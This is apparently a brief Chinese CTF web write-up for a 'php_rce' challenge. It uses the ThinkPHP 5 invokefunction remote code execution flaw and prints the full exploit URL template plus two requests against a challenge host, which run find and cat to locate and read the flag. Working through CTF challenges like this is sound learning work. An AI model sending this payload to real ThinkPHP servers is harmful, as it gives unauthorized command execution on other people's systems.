CTFweb writeup 每日更新,php_rce
1.php_rce
额,这个之前没见过。后来了解到Thinkphp 5 有漏洞 漏洞介绍
http://IP/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=指令
比如执行,查找flag文件
http://111.198.29.45:43429/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "*flag"
显示 /flag /flag
直接打开flag文件
http://111.198.29.45:43429/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
得到 flag{thinkphp5_rce}
这个题有特殊性吧,不知道漏洞是解不出来。积累一下。
第二道题遇到了点问题,随后会更新。